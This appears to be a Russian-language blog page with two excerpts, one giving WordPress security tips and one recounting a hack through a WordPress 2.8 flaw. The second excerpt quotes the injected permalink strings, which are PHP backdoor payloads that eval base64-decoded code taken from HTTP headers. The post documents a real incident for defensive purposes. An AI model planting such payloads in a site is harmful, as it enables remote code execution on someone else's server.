Как защитить блог WordPress от взлома

Большинство сайтов и блогов взламываются автоматически, т.е. без прямого участия взломщика. Специальные скрыпты и программы (вирусы) находят уязвимости в системах управления и скриптах сайта, подбирают простые пароли к учетным записям администратора, воруют пароли с помощью троянов и клавиатурных шпионов. Конечно, от всего не убережешься, но если соблюдать несколько простых правил, можно процентов на 90 уменьшить вероятность взлома своего блога. После взлома этого блога я очень забочусь о безопасности :).

Защита блога от взлома

Как защитить блог от взлома:

1. Придумать или сгенерировать уникальные сложные пароли для разных сайтов.
Хороший пароль не должен быть похож на осмысленное слово или словосочетание, в нем должны быть спецсимволы, цифры и буквы разных регистров. Такие пароли сложно запомнить, потому их лучше записать на бумаге или использовать для этого специальные программы, которые хранят пароли в зашифрованном виде.

2. Настроить программу хранения паролей в зашифрованном виде.
Конечно, пароли можно хранить в блокноте на рабочем столе. Очень удобно, но очень небезопасно. Рано или поздно ваш компьютер подцепит какую-то заразу и все ваши пароли могут стать достоянием общественности.

У меня был такой файлик и я знаю, как тяжело избавиться от привычки хранить пароли в одном месте в открытом виде. Но в один прекрасный день, после 2х суток исправления последствий заражения моих сайтов злым вирусом по FTP, я потратил 3 часа на установку и переписывание обновленных паролей в специальную программу, которая хранит пароли в зашифрованном виде. Заодно перестал хранить пароли к ftp в Total Commander. Да, нудно и неудобно, зато с тех пор мои пароли не воровались. Нервные клетки мне очень благодарны.

Программ для хранения зашифрованных паролей очень много, есть платные, есть бесплатные. Не буду писать, какой программой пользуюсь я — чем меньше потенциальные взломщики знают о вашей защите, тем лучше ;).

Читать полностью »

Взлом моего блога через уязвимость WordPress

Скупой платит дважды, а ленивый работает в два раза больше. Об этом я вспомнил, когда мой блог стал очередной жертвой уязвимости в движке WordPress 2.8, устраненной только в версии WordPress 2.8.4. Благодаря этой дыре можно удаленно изменить пароль администратора блога WordPress, получив тем самым полный доступ к админке блога. Как что не стоит лениться обновлять движок до последней версии – спокойнее спаться будет.

В принципе, скрипт, получивший доступ к админке моего блога, не сделал ничего страшного. Или просто не успел сделать. Ко всем ссылкам на статьи блога дописывалось что-то вроде

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
и
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Этот код делал почти все ссылки блога мертвыми, переходы на посты не работали. Я перезалил шаблоны из последнего бэкапа, обновил движок WordPress, но ссылки не стали прежними. Файл .htaccess тоже был в порядке. Подозрение, что взломан хостинг, тоже не оправдались. И только просматривая параметры постоянных ссылок (Администрирование->Параметры->Постоянные ссылки) блога, я с удивлением заметил следующее:

Изменение шаблона ссылки в результате взлома WordPress

Читать полностью »